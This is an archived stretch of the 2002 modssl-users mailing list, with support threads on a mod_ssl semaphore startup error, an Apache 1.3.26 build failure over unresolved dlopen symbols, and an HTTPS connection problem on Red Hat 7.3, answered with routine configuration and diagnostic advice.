I get the following error and apache doesn't start:
[Mon Aug  5 10:39:51 2002] [error] mod_ssl: Cannot allocate shared memory: 
mm:core: failed to open semaphore file (No such file or directory)

Does anyone know what I need to do to make this work?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 21:05:28 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA23276; Mon, 5 Aug 2002 21:04:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA23201; Mon, 5 Aug 2002 21:02:27 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 1B0CF4CE774; Mon,  5 Aug 2002 21:02:24 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 658F628857; Mon,  5 Aug 2002 19:35:57 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from schoollink.net id SAA18913; Mon, 5 Aug 2002 18:45:13 +0200 (MET DST)
Received: from [172.16.1.15] (HELO Tupper)
  by schoollink.net (CommuniGate Pro SMTP 3.5.9)
  with SMTP id 25546588 for modssl-users@modssl.org; Mon, 05 Aug 2002 12:38:39 -0400
Received: by localhost with Microsoft MAPI; Mon, 5 Aug 2002 12:42:57 -0400
Message-ID: <01C23C7D.A0306560.cherryal@riverstone.halifaxnc.com>
From: Alicianiah Cherry 
To: "'modssl-users@modssl.org'" 
Subject: Problem Connecting via https Over Network and Internet
Date: Mon, 5 Aug 2002 12:42:56 -0400
Organization: RiverStone Counseling and Personal Development
X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alicianiah Cherry 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have Red Hat v 7.3 Professional installed with Apache 1.3.23 and mod_ssl 
2.8.7.  I have made a test certificate per the Red Hat manual instructions. 
 I can access the https web pages with Netscape on the server itself, but I 
am unable to connect to the https pages over the internal network or over 
the network.  I also have a Win2k server running that also uses SSL, and 
have no problems connecting to that server via https using Netscape.  Any 
suggestions?

Alicia Cherry
Systems Administrator
RiverStone Counseling
cherryal@riverstone.halifaxnc.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 21:05:42 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA23311; Mon, 5 Aug 2002 21:04:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id VAA23194; Mon, 5 Aug 2002 21:02:25 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 0A8204CE764; Mon,  5 Aug 2002 21:02:24 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id BC8CD28827; Mon,  5 Aug 2002 19:34:49 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from relay.pair.com id NAA12442; Mon, 5 Aug 2002 13:16:49 +0200 (MET DST)
Received: (qmail 34304 invoked from network); 5 Aug 2002 11:16:47 -0000
Received: from p5083476a.dip0.t-ipconnect.de (HELO jura.uni-tuebingen.de) (80.131.71.106)
  by relay1.pair.com with SMTP; 5 Aug 2002 11:16:47 -0000
X-pair-Authenticated: 80.131.71.106
Message-ID: <3D4E5E39.6BDC0257@jura.uni-tuebingen.de>
Date: Mon, 05 Aug 2002 13:15:05 +0200
From: Adrian Hardt 
X-Mailer: Mozilla 4.78 [de] (Win98; U)
X-Accept-Language: de
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Apache_1.3.26 with mod_ssl: build failed
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Adrian Hardt 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello. I have a problem compiling apache_1.3.26 with mod_ssl. After

cd mod_ssl-2.8.10-1.3.26
./configure --with-layout=Apache --enable-module=rewrite
--enable-module=proxy --server-uid=httpd --server-gid=httpd
--enable-suexec --suexec-caller=httpd --suexec-docroot=/home
--suexec-userdir=public_html --enable-module=expires
--with-apache=../apache_1.3.26 --with-ssl=../openssl-0.9.6e
--enable-module=ssl
cd ../apache_1.3.26

make (of apache) failed with the following lines. Can anybody help,
please?

Thank you. Adrian


Hello.

I have a problem compiling apache_1.3.26 with mod_ssl. After

cd mod_ssl-2.8.10-1.3.26
./configure --with-layout=Apache --enable-module=rewrite --enable-module=proxy --server-uid=httpd --server-gid=httpd --enable-suexec --suexec-caller=httpd --suexec-docroot=/home --suexec-userdir=public_html --enable-module=expires --with-apache=../apache_1.3.26 --with-ssl=../openssl-0.9.6e --enable-module=ssl
cd ../apache_1.3.26

make (of apache) failed with the following lines. Can anybody help, please?

Thank you. Adrian


<=== src/modules/ssl
<=== src/modules
gcc -c  -I./os/unix -I./include   -DLINUX=22 -I/usr/include/db1 -DMOD_SSL=208110 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED `./apaci` modules.c
gcc -c  -I./os/unix -I./include   -DLINUX=22 -I/usr/include/db1 -DMOD_SSL=208110 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED `./apaci` buildmark.c
gcc  -DLINUX=22 -I/usr/include/db1 -DMOD_SSL=208110 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED `./apaci` -L/home1/st/h/s-haa5/src/openssl-0.9.6e   \
      -o httpd buildmark.o modules.o modules/standard/libstandard.a modules/proxy/libproxy.a modules/ssl/libssl.a main/libmain.a ./os/unix/libos.a ap/libap.a regex/libregex.a lib/expat-lite/libexpat.a  -lm -lcrypt -ldb1  -lssl -lcrypto
modules/proxy/libproxy.a(proxy_cache.o): In function `ap_proxy_cache_update':
proxy_cache.o(.text+0x2d30): the use of `mktemp' is dangerous, better use `mkstemp'
/home1/st/h/s-haa5/src/openssl-0.9.6e/libcrypto.a(dso_dlfcn.o): In function `dlfcn_load':
dso_dlfcn.o(.text+0xa2): undefined reference to `dlopen'
dso_dlfcn.o(.text+0xb7): undefined reference to `dlopen'
dso_dlfcn.o(.text+0x11b): undefined reference to `dlclose'
/home1/st/h/s-haa5/src/openssl-0.9.6e/libcrypto.a(dso_dlfcn.o): In function `dlfcn_bind_var':
dso_dlfcn.o(.text+0x1da): undefined reference to `dlsym'
/home1/st/h/s-haa5/src/openssl-0.9.6e/libcrypto.a(dso_dlfcn.o): In function `dlfcn_bind_func':
dso_dlfcn.o(.text+0x2aa): undefined reference to `dlsym'
/home1/st/h/s-haa5/src/openssl-0.9.6e/libcrypto.a(dso_dlfcn.o): In function `dlfcn_unload':
dso_dlfcn.o(.text+0x3a7): undefined reference to `dlclose'
collect2: ld returned 1 exit status
make[2]: *** [target_static] Error 1
make[2]: Leaving directory `/home1/st/h/s-haa5/src/apache_1.3.26/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/home1/st/h/s-haa5/src/apache_1.3.26'
make: *** [build] Error 2
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 21:14:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA23722; Mon, 5 Aug 2002 21:11:56 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.sdsu.edu id VAA23643; Mon, 5 Aug 2002 21:10:26 +0200 (MET DST)
Received: from localhost (dlowenst@localhost)
	by mail.sdsu.edu (8.11.4/8.11.4) with ESMTP id g75JAKS11512
	for ; Mon, 5 Aug 2002 12:10:20 -0700 (PDT)
Date: Mon, 5 Aug 2002 12:10:20 -0700 (PDT)
From: David Lowenstein 
To: modssl-users@modssl.org
Subject: Re: Error starting apache
In-Reply-To: <200208051142.34659.laurence@isp.nwu.edu>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Lowenstein 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Look for a line in your httpd.conf file that looks like:

SSLMutex  file:/usr/local/apache/logs/ssl_mutex

Make sure that the path (everything preceding ssl_mutex) exists and is
writeable by the httpd user. Your conf file might point to some directory
that you don't have. The ssl_mutex file will be created when you start up
sucessfully.



Dave Lowenstein
Programmer/Analyst
Instructional Technology Services
San Diego State University
(619)594-0270
http://www-rohan.sdsu.edu/dept/its

On Mon, 5 Aug 2002, Laurence Berland wrote:

> I'm trying to use apache with mod_ssl using the RPMs from redhat:
> [root@wiggum conf]# rpm -q apache
> apache-1.3.19-5
> [root@wiggum conf]# rpm -q mod_ssl
> mod_ssl-2.8.1-5
> 
> I get the following error and apache doesn't start:
> [Mon Aug  5 10:39:51 2002] [error] mod_ssl: Cannot allocate shared memory: 
> mm:core: failed to open semaphore file (No such file or directory)
> 
> Does anyone know what I need to do to make this work?
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 21:23:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA24880; Mon, 5 Aug 2002 21:22:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id VAA24873; Mon, 5 Aug 2002 21:21:48 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g75JIurB014823
	for ; Mon, 5 Aug 2002 15:18:56 -0400
Date: Mon, 5 Aug 2002 15:18:56 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26 with mod_ssl: build failed
In-Reply-To: <3D4E5E39.6BDC0257@jura.uni-tuebingen.de>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 5 Aug 2002, Adrian Hardt wrote:

> /home1/st/h/s-haa5/src/openssl-0.9.6e/libcrypto.a(dso_dlfcn.o): In function `dlfcn_unload':
> dso_dlfcn.o(.text+0x3a7): undefined reference to `dlclose'
> collect2: ld returned 1 exit status
> make[2]: *** [target_static] Error 1
> make[2]: Leaving directory `/home1/st/h/s-haa5/src/apache_1.3.26/src'
> make[1]: *** [build-std] Error 2
> make[1]: Leaving directory `/home1/st/h/s-haa5/src/apache_1.3.26'
> make: *** [build] Error 2

Hmm... that's interesting.  Try building in mod_so so that libdl will be
linked in.  Odd that your statically linked openssl library would want
libdl though... hmph.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 21:32:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA25067; Mon, 5 Aug 2002 21:31:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.lab.te.sia.it id VAA25062; Mon, 5 Aug 2002 21:30:36 +0200 (MET DST)
Received: from iris (IDENT:ZNv9z++cGPWZZIbPqNXrMOPtF622A6U3@localhost.localdomain [127.0.0.1])
	by iris.lab.te.sia.it (8.11.6/8.11.6) with ESMTP id g75JUgS09929
	for ; Mon, 5 Aug 2002 19:30:44 GMT
Content-Type: text/plain;
  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org
Subject: Re: Problem Connecting via https Over Network and Internet
Date: Mon, 5 Aug 2002 21:30:41 +0200
User-Agent: KMail/1.4.1
References: <01C23C7D.A0306560.cherryal@riverstone.halifaxnc.com>
In-Reply-To: <01C23C7D.A0306560.cherryal@riverstone.halifaxnc.com>
MIME-Version: 1.0
Message-Id: <200208052130.41249.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA25063
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

you haven't reported any  detail about Netscape error, so it's hard to help u;
without knowing anything related your probem, i suggest you to create a cert 
issued not to localhot.localdomain; but for the ServerName u are using.
It's self-signed, of course; but netscape deny access to a server presenting a 
cert intitled to something already visited.
maybe u have another cert for localhos.localdomain.
the only way to get help is provide details.

-- maumar

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 22:14:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA25965; Mon, 5 Aug 2002 22:13:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from schoollink.net id WAA25909; Mon, 5 Aug 2002 22:13:09 +0200 (MET DST)
Received: from [172.16.1.15] (HELO Tupper)
  by schoollink.net (CommuniGate Pro SMTP 3.5.9)
  with SMTP id 25558443 for modssl-users@modssl.org; Mon, 05 Aug 2002 16:06:36 -0400
Received: by localhost with Microsoft MAPI; Mon, 5 Aug 2002 16:10:54 -0400
Message-ID: <01C23C9A.ACEC6980.cherryal@riverstone.halifaxnc.com>
From: Alicianiah Cherry 
To: "'modssl-users@modssl.org'" 
Subject: RE: Problem Connecting via https Over Network and Internet
Date: Mon, 5 Aug 2002 16:10:53 -0400
Organization: RiverStone Counseling and Personal Development
X-Mailer: Microsoft Internet E-mail/MAPI - 8.0.0.4211
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alicianiah Cherry 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks for responding.  The certificate was issued to the ip address of my 
server (not localhost or 127.0.0.1).  Netscape just returns the message 
that the connection was not able to be established.  I also get the error 
message in IE, "Cannot Find Server or DNS Error".  There is not much 
information in the error message that is returned by the browsers.

Alicia  Cherry

-----Original Message-----
From:	Maurizio Marini [SMTP:maumar@datalogica.com]
Sent:	Monday, August 05, 2002 3:31 PM
To:	modssl-users@modssl.org
Subject:	Re: Problem Connecting via https Over Network and Internet

you haven't reported any  detail about Netscape error, so it's hard to help 
u;
without knowing anything related your probem, i suggest you to create a 
cert
issued not to localhot.localdomain; but for the ServerName u are using.
It's self-signed, of course; but netscape deny access to a server 
presenting a
cert intitled to something already visited.
maybe u have another cert for localhos.localdomain.
the only way to get help is provide details.

-- maumar

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 22:23:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA26439; Mon, 5 Aug 2002 22:22:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id WAA26430; Mon, 5 Aug 2002 22:21:18 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA10131;
	Mon, 5 Aug 2002 16:24:04 -0400
Date: Mon, 5 Aug 2002 16:24:04 -0400 (EDT)
From: "R. DuFresne" 
To: Alicianiah Cherry 
cc: "'modssl-users@modssl.org'" 
Subject: RE: Problem Connecting via https Over Network and Internet
In-Reply-To: <01C23C9A.ACEC6980.cherryal@riverstone.halifaxnc.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


first, your apache and ssl source looks old, upgrade, there are security
reasons for the upgrade need.

"Cannot Find Server or DNS Error", is usually related to DNS issues, means
you prolly do not have DNS setup correctly, ot that you have not
registered the domain in question, the short 'testing' workabout is to try
the IP address in question, not the domain name.

Thanks,

Ron DuFresne

On Mon, 5 Aug 2002, Alicianiah Cherry wrote:

> Thanks for responding.  The certificate was issued to the ip address of my 
> server (not localhost or 127.0.0.1).  Netscape just returns the message 
> that the connection was not able to be established.  I also get the error 
> message in IE, "Cannot Find Server or DNS Error".  There is not much 
> information in the error message that is returned by the browsers.
> 
> Alicia  Cherry
> 
> -----Original Message-----
> From:	Maurizio Marini [SMTP:maumar@datalogica.com]
> Sent:	Monday, August 05, 2002 3:31 PM
> To:	modssl-users@modssl.org
> Subject:	Re: Problem Connecting via https Over Network and Internet
> 
> you haven't reported any  detail about Netscape error, so it's hard to help 
> u;
> without knowing anything related your probem, i suggest you to create a 
> cert
> issued not to localhot.localdomain; but for the ServerName u are using.
> It's self-signed, of course; but netscape deny access to a server 
> presenting a
> cert intitled to something already visited.
> maybe u have another cert for localhos.localdomain.
> the only way to get help is provide details.
> 
> -- maumar
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 22:42:44 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA26778; Mon, 5 Aug 2002 22:41:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id WAA26771; Mon, 5 Aug 2002 22:41:12 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H0E1GD00.MCA for ; Mon, 5 Aug 2002
          21:41:02 +0100 
Message-ID: <3D4EE2DB.4040905@itaction.co.uk>
Date: Mon, 05 Aug 2002 21:40:59 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problem Connecting via https Over Network and Internet
References: <01C23C9A.ACEC6980.cherryal@riverstone.halifaxnc.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

sorry if this is a little obvious but maybe you are not listening on all 
interfaces as a result of your config file... check you have a Listen 
443 rather than Listen hostname:443 - when apache is running see if 
somethings LISTENing by doing:

netstat -an |grep LISTEN|grep 443

and make sure you're either listening on *:443 or  {yourip}:443 not 
127.0.0.1:443


for diagnosis i find it helps to bypass the weirdness of the browsers 
and use something more simple to check connectivity - no harm in 
telnetting to port 443 directly and hitting enter a couple of times - 
see the error log output after you do this to confirm you've got the 
right server process listening on that port.  Next step is to check SSL 
with  a SSL enabled curl, or even the openssl command is capable of 
connecting you to a https server (see openssl FAQ).

with curl you can display the certificate details returned which can be 
quite helpful in testing scripts - one thing is for sure though, it 
doesnt matter a jot what common name the cert was made for, SSL should 
still be able to complete negotiations..

also go into IE 'advanced settings' and turn of that stooopid 'show 
friendly HTTP error messages' tickbox - this will at least stop most of 
the 'DNS' error messages, at least if you are getting an error from the 
webserver you will see it then.... that message is second only to the 
talking paperclip in my M$ hate-list .

Alicianiah Cherry wrote:

>Thanks for responding.  The certificate was issued to the ip address of my 
>server (not localhost or 127.0.0.1).  Netscape just returns the message 
>that the connection was not able to be established.  I also get the error 
>message in IE, "Cannot Find Server or DNS Error".  There is not much 
>information in the error message that is returned by the browsers.
>
>Alicia  Cherry
>
>-----Original Message-----
>From:	Maurizio Marini [SMTP:maumar@datalogica.com]
>Sent:	Monday, August 05, 2002 3:31 PM
>To:	modssl-users@modssl.org
>Subject:	Re: Problem Connecting via https Over Network and Internet
>
>you haven't reported any  detail about Netscape error, so it's hard to help 
>u;
>without knowing anything related your probem, i suggest you to create a 
>cert
>issued not to localhot.localdomain; but for the ServerName u are using.
>It's self-signed, of course; but netscape deny access to a server 
>presenting a
>cert intitled to something already visited.
>maybe u have another cert for localhos.localdomain.
>the only way to get help is provide details.
>
>-- maumar
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>
>I have Red Hat v 7.3 Professional installed with Apache 1.3.23 and mod_ssl 
>2.8.7.  I have made a test certificate per the Red Hat manual instructions. 
> I can access the https web pages with Netscape on the server itself, but I 
>am unable to connect to the https pages over the internal network or over 
>the network.  I also have a Win2k server running that also uses SSL, and 
>have no problems connecting to that server via https using Netscape.  Any 
>suggestions?
>
>Alicia Cherry
>Systems Administrator
>RiverStone Counseling
>cherryal@riverstone.halifaxnc.com
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  5 23:53:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA28499; Mon, 5 Aug 2002 23:52:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from schoollink.net id XAA28495; Mon, 5 Aug 2002 23:51:41 +0200 (MET DST)
Received: from [216.4.140.142] (HELO alawrence)
  by schoollink.net (CommuniGate Pro SMTP 3.5.9)
  with SMTP id 25563166 for modssl-users@modssl.org; Mon, 05 Aug 2002 17:45:06 -0400
From: "Alicianiah L. Cherry" 
To: 
Subject: RE: Problem Connecting via https Over Network and Internet
Date: Mon, 5 Aug 2002 17:50:31 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
In-Reply-To: 
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alicianiah L. Cherry" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Http connections work fine.  It's just the https connections that are not
working.  I am entering the actual ip address of the server to access the
pages, as I do not have the ip address registered. If it were a DNS issue,
would not the http connections be effected as well? By the way, the exact
message from Netscape is "There was no response. The server could be down or
is not responding."

Thanks,

Alicia

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of R. DuFresne
Sent: Monday, August 05, 2002 4:24 PM
To: Alicianiah Cherry
Cc: 'modssl-users@modssl.org'
Subject: RE: Problem Connecting via https Over Network and Internet



first, your apache and ssl source looks old, upgrade, there are security
reasons for the upgrade need.

"Cannot Find Server or DNS Error", is usually related to DNS issues, means
you prolly do not have DNS setup correctly, ot that you have not
registered the domain in question, the short 'testing' workabout is to try
the IP address in question, not the domain name.

Thanks,

Ron DuFresne

On Mon, 5 Aug 2002, Alicianiah Cherry wrote:

> Thanks for responding.  The certificate was issued to the ip address of my
> server (not localhost or 127.0.0.1).  Netscape just returns the message
> that the connection was not able to be established.  I also get the error
> message in IE, "Cannot Find Server or DNS Error".  There is not much
> information in the error message that is returned by the browsers.
>
> Alicia  Cherry
>
> -----Original Message-----
> From:	Maurizio Marini [SMTP:maumar@datalogica.com]
> Sent:	Monday, August 05, 2002 3:31 PM
> To:	modssl-users@modssl.org
> Subject:	Re: Problem Connecting via https Over Network and Internet
>
> you haven't reported any  detail about Netscape error, so it's hard to
help
> u;
> without knowing anything related your probem, i suggest you to create a
> cert
> issued not to localhot.localdomain; but for the ServerName u are using.
> It's self-signed, of course; but netscape deny access to a server
> presenting a
> cert intitled to something already visited.
> maybe u have another cert for localhos.localdomain.
> the only way to get help is provide details.
>
> -- maumar
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 00:03:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA29025; Tue, 6 Aug 2002 00:02:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iris.lab.te.sia.it id AAA29018; Tue, 6 Aug 2002 00:02:09 +0200 (MET DST)
Received: from iris (IDENT:arSOzQeBZYyYM4e18xE0wAJdV4jzsvjB@localhost.localdomain [127.0.0.1])
	by iris.lab.te.sia.it (8.11.6/8.11.6) with ESMTP id g75M2G810137
	for ; Mon, 5 Aug 2002 22:02:17 GMT
Content-Type: text/plain;
  charset="iso-8859-1"
From: Maurizio Marini 
To: modssl-users@modssl.org
Subject: Re: Problem Connecting via https Over Network and Internet
Date: Tue, 6 Aug 2002 00:02:15 +0200
User-Agent: KMail/1.4.1
References: 
In-Reply-To: 
MIME-Version: 1.0
Message-Id: <200208060002.15181.maumar@datalogica.com>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id AAA29020
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maurizio Marini 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

 "There was no response. The server could be down
> or is not responding."

firewall?
-- maumar

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug  6 00:07:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA29342; Tue, 6 Aug 2002 00:06:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from schoollink.net id AAA29113; Tue, 6 Aug 2002 00:05:22 +0200 (MET DST)
Received: from [216.4.140.142] (HELO alawrence)
  by schoollink.net (CommuniGate Pro SMTP 3.5.9)
